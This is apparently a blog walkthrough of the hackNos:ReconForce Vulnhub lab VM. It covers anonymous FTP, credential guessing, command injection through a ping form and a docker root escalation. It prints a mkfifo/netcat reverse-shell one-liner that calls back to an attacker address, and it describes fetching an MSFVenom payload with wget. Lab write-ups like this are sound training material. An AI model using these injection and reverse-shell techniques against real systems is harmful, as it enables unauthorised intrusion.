Today we’re doing hackNos:ReconForce VM from Vulnhub.com it waas created by Rahul Gehlaut and is part of the hackNos series. It is rated as an intermediate VM. Let’s dive in and see how far we get.

So as usual the first step is to nmap the box to see what services are running on it. I am going to use the awesome nmapAutomator script this time.

So it’s got 3 ports open, we should start by looking at the 80 port and then move onto the FTP to see if there are files/info on there that might be helpful.

80 port first though.

Thats a pretty hacker themed front page right there, haha. Looking at the source code there isnt much there, but if we click on the “TroubleShooting” link in the middle of the page it pops up a login window.

We havent found any credentials at this point but it’s worth us trying a few common ones on the off chance that we get lucky. By common I mean things like admin:admin or admin:password etc.

After trying a few different options and not getting anywhere I think we should move on and try to find some credentials or clues that we can use on to log in.

Lets move onto the FTP server and see if thats the way we should be moving. We got lucky as the server allows anonymous logins.

Taking a look around shows us that there is nothing on the server for us to use at all.

Hmmm this doesnt feel right, there is an FTP server on the box for a reason it isnt there just by chance. What are we missing?

The only thing the server is telling us seems to be the header “Security@hackNos” maybe it is a username or password?

Lets try to use it on the login box we found before.

After trying a few different combinations I tried admin:Security@hackNos and got lucky and found ourselves logged in :-)

Awesome, we are in. It seems to be an input box that will allow us to “ping” an IP address. We can see the output of the scan if we just aim it at itself.

Ok so, we need to find out a way of exploiting the input box. Let’s jump over to google and see what we can find. I remember a box on HTB I think from last year time where it had a similar exploit and essentially you had to run the ping command and then append whatever command you wanted to run on the end of it but I cant remember the way to run both commands. Let’s quickly try a simple & or && which would work on an actual linux cli.

That didn’t work, so I went back to google and found this HackerOne blog post which gave me loads of things to try. I started at the top of the list and worked my way down until I got to this one.

It didnt work on the first attempt but when I tweaked it slightly for the input box we have, we dont need to give the ping command and we only need the IP address and then the “injectionCmd” part so our full injection command becomes:

Get Andrew Hilton’s stories in your inbox

Join Medium for free to get updates from this writer.

<IP> |<injectionCmd>

When we send this command off, we get a hit and we can run RCE on the victim machine.

Perfect, ok so we have found the weakness in the armour, now to fully exploit it and get a shell on the machine. The first thing we should try is a one line nc shell and see if we can get it to call back to our attacking machine. Lets start a simple nc listener and then ping the command off.

Ok so the basic nc one liner didnt work but we have more to try so lets move onto the next one which is:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

That didnt work either, so we need to get a little bit more adventurous, we can create an MSFVenom payload and try to upload it using the cmd injection and trying to WGET the file onto the victim box. Lets create the payload first

Now we have the payload we should try to upload it.

We dont get any feedback from the upload but let’s assume that it worked and move onto the next step. We need to start a meterpreter handler to hopefully catch the call back.

Once we run the cmd |php shell.php we are greeted with the best sight!!

Now that we have a session open, we can upload one of our trusty enumeration scripts and try to find a way to root. First we can grab the user flag.

Awesome, one down, root to go.

After looking around the box for ages, and finding nothing of much use, I did see one user on the box called recon, so on a whim I tried su’ing to them using the same password as the login box from earlier.

It worked!! Lets upload one of our enum scripts and see what we can find.

After running linpeas.sh and reviewing the output the only thing that stands out is that docker seems to be running on the machine.

Ok so let’s jump back to google and see if we can find a way to exploit docker. We should start by looking at the absolutely amazing GTFOBins site.

There are a few cmds we can run that use docker, so lets start at the first one and go from there until we end up exploiting it or running out of things to try. Let’s run the first cmd.

Wow, I didnt expect it to work on the first try!! But thats it, we are root and thats game over. All we need to do now is grab the root flag before we log out.

Thanks to Rahul Gehlaut for creating the VM and for Vulnhub for hosting it and all the other great VM’s on their site.

If you found this article helpful, please give it some 👏 and share it with anyone who you think might find it helpful! + Feedback and coffees are always welcome! 😄

Take care and hopefully I’ll see you back here soon for more content and walkthroughs.

ReconForce — Vulnhub.com

Get Andrew Hilton’s stories in your inbox